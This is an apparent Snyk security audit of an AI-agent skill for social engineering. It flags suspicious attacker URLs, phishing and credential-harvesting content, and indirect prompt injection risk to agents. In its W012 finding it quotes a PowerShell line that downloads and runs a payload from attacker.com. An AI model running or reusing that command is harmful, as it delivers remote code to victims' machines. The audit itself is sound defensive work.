performing-social-engineering
Fail
Audited by Snyk on Mar 21, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.95). These URLs include multiple attacker-controlled hosts and direct links to executable/script payloads (e.g., attacker.com/payload.ps1, attacker.com/malware.exe), credential-harvesting endpoints, tracking hooks, and phishing/command-and-control infrastructure—so despite some legitimate references, the set is highly suspicious and suitable for malware/credential distribution.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This skill content is explicitly malicious: it provides step‑by‑step instructions and runnable code for phishing, credential harvesting, remote code execution, malware delivery, backdoors, and detection‑avoidance techniques intended to steal credentials and compromise systems.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). Yes — the SKILL.md explicitly instructs fetching and mirroring public websites (e.g., "Clone Legitimate Sites" with httrack/wget/curl to copy http://legitimate-site.com) and performing social-media recon (LinkedIn/theHarvester), so the agent would ingest untrusted public/user-generated content that could materially influence campaign actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and execute remote code—e.g., the VBA/HTA/PowerShell examples call IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1')), which downloads and immediately executes code from http://attacker.com/payload.ps1.
Issues (4)
- E005 (CRITICAL): Suspicious download URL detected in skill instructions.
- E006 (CRITICAL): Malicious code pattern detected in skill scripts.
- W011 (MEDIUM): Third-party content exposure detected (indirect prompt injection risk).
- W012 (MEDIUM): Unverifiable external dependency detected (runtime URL that controls agent).